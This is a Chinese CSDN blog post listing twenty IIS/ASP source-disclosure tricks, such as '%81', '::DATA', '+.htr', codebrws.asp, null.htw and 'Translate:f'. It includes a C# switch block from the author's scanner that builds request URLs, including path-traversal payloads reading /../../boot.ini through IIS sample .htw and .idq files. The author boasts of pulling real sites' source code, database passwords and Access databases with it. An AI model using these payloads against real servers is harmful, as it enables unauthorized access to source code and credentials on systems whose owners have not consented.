20种看asp源码的方法

最新推荐文章于 2023-06-27 16:05:19 发布
最新推荐文章于 2023-06-27 16:05:19 发布
阅读量4.1k 收藏 2
点赞数
文章标签: asp sql server 数据库 socket access windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jikong/article/details/607756
版权

  众所周知windows平台漏洞百出,补丁一个接一个,但总是补也补不净。我把我所知道的20种看asp源码的方法总结了一下,并且用c#写了个应用程序来扫描这些漏洞,发现虽然大部分的方法已经不起做用,但还是有一些漏网之鱼的:),结果这两天真看到不少站的源代码,包括数据库密码,如果用access的可以把库下载下来,而用sql server的如果不是用udl,dsn等来连接的话,也可以通过tcp/ip网络库连接到数据库,为所欲为呀。先面把这20种方法列在下面:  

.
%81
::DATA
%2e
%2e%41sp
+.htr
//
longhtr
.bak
codebrws.asp
showcode.asp
null.htw
qfullhit.htw
qsumrhit.htw
query.idq
search/qfullhit.htw
search/qsumrhit.htw
iirturnh.htw
.htw
Translate:f

  上边这些漏洞前面10几条是通过在asp文件后直接加上,如%81就是xxx.asp%81,后面这些都是通过iis自带的例子或系统漏洞实现的,最特别的是那种translate:f方法,它直接通过浏览器是无法使用的,必须同服务器建立tcp/ip的socket连接,发送请求才行,具体每个漏洞如何使用,看下面,这是我那个应用程序的一部分,如果你要全部的可以到我的站点去下载。

switch (this.cboMethod.SelectedIndex)
{
case 0: //直接读取
strRequestFile = strServer + strUrl ;
break ;
case 5 : //%2e%41sp
strRequestFile = strServer + strPath + strFirst
+ "%2e%41sp" ;
break ;
case 8 : //longhtr
strRequestFile = strServer + strUrl
+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
break ;

case 10: //codebrws.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ strUrl ;
break ;

case 11: //showcode.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ "/msadc/../../../../boot.ini" ;
break;

case 12 : //null.htw
strRequestFile = strServer + "/null.htw?CiWebHitsFile="
+ strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
break ;
case 13 : //qfullhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 14 : //qsumrhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 15 : //query.idq
strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
break ;

case 16: //search/qfullhit.htw
strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 17: // search/qsumrhit.htw
strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 18: //iirturnh.htw
strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 19: //.htw
strRequestFile = strServer + strUrl
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full" ;
break ;

default:
strRequestFile = strServer + strUrl + this.cboMethod.Text ;
}

jikong
关注
简单的asp网站源码
05-19
这是一个简单易用的asp网站源码。具有静态显示和动态展示图片功能。
完整ASP.NET个人网站毕业设计项目源代码与论文
最新发布
weixin_32869687的博客
03-12 950
本文还有配套的精品资源,点击获取 简介:ASP.NET是一基于.NET Framework的服务器端编程模型,用于创建Web应用程序和服务。本毕业设计项目展示了如何使用ASP.NET构建一个基于浏览器-服务器架构的个人网站,并包括完整的源代码和相关设计论文。项目内容涵盖用户界面设计、业务逻辑层实现、数据访问层开发、配置管理和全局性设置,以及系统设计、实现过程、测试与优化的...
ASP技术】web杂谈(1)之什么是ASP
赏樱看雪撸代码
06-27 5945
什么是 ASP,Request和Response的介绍,Application和session的详细讲解,ASP的特点,ASP的编程环境,ASP内嵌对象,Asp的应用范例。深入了解ASP技术。
怎样用ASP代码获取网页源代码
子弹头zdt的专栏
09-23 1917
在使用ajax的时候,我们无法跨域获取不属于自己的服务器的数据,故引出了这么一方法来辗转获取: 1、向本域中的网页请求数据,包含一个网址信息 2、被请求的本域的网页中的asp代码向跨域的服务器请求数据,然后返回给本域中的asp文件 代码: 1 2 3 4 5 6 7 8 9 10 11 12 Function getHt
查看ASP代码方法
weixin_34064653的博客
08-09 621
查看ASP代码方法 以下正文: 我们都知道asp这一类的服务器端处理的程序,其好处之一就是只向客户端输出 标准的Html流。因此可以起到向客户隐藏细节的作用。也就是说当我们在浏览器中 键入asp程序的网址后只能看见标准的Html文件,而不能看见asp的内容。但有时, 例如在一个asp的教学站点,我们有必要显示a...
20ASP验证码分析程序源码
01-20
3. **图像生成**:ASP源码中会有创建图像的步骤,包括设置图像尺寸、背景色、前景色等,以及在图像上绘制字符。 4. **噪声元素**:为了进一步混淆,验证码可能会添加随机的线条、斑点或像素干扰,以防止OCR软件识别...
asp.net 抓取网页源码实现方法
01-02
方法1 比较推荐  /// <summary> /// 用HttpWebRequest取得网页源码 /// 对于带BOM的网页很有效,不管是什么编码都能正确识别 /// /// 网页地址 /// 返回网页源文件 public static string GetHtmlSource2...
ASP源码—企业网站通用源码.zip
10-23
解压并分析这个“ASP源码—企业网站通用源码.zip”,开发者可以学习如何组织ASP项目结构,了解常见ASP功能的实现方法,以及如何将静态设计与动态功能相结合。同时,对于初学者来说,这是一个极好的学习资源,可以...
ASP源码20ASP验证码系统.zip
10-14
ASP源码20ASP验证码系统.zip
158兼职赚钱asp源码
11-21
158兼职赚钱asp源码
asp语法大全ASP程序设计源代码
09-01
很好ASP程序设计源代码ASP程序设计源代码ASP程序设计源代码ASP程序设计源代码
ASP网页程序设计源码
05-13
ASP网络程序设计的课本上每个例子的源码!,很好用!!
JS和CS互访的问题
胡枫的资料中心
04-10 760
.如何在JavaScript访问C#函数? 2.如何在JavaScript访问C#变量? 3.如何在C#中访问JavaScript的已有变量? 4.如何在C#中访问JavaScript函数? 问题1答案如下: javaScript函数中执行C#代码中的函数: 方法一:1、首先建立一个按钮,在后台将调用或处理的内容写入button_click中; 2、在前台写一个js函数,内容为document
分享120ASP源码,总有一款适合您
zy0412326的专栏
01-13 3116
asp
分享125个ASP源码,总有一款适合你
zy0412326的专栏
11-19 3479
ASP 源码
分享90个ASP源码,总有一款适合你
zy0412326的专栏
11-21 2038
asp 源码
经典ASP代码大集合
weixin_33858249的博客
12-23 1152
1. oncontextmenu="window.event.returnvalue=false" 将彻底屏蔽鼠标右键&lt;table border oncontextmenu=return(false)&gt;&lt;td&gt;no&lt;/table&gt; 可用于Table 2. &lt;body onselectstart="return false"&gt; 取消选取、防止复制 3...
分享105个ASP.NET整站系统源码,总有一款适合您
zy0412326的专栏
03-03 4126
分享105个ASP.NET整站系统源码,总有一款适合您
ASP验证码源码集合 v1.0:20实现方式详细解析
标签"ASP源码-其它源码"说明这个压缩包属于ASP源码分类下的一个子集。在这个分类下,通常会包含各ASP编写的实用程序、类库、模块等。这类资源对于ASP开发人员来说非常宝贵,因为它们可以作为学习示例或者直接用于...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值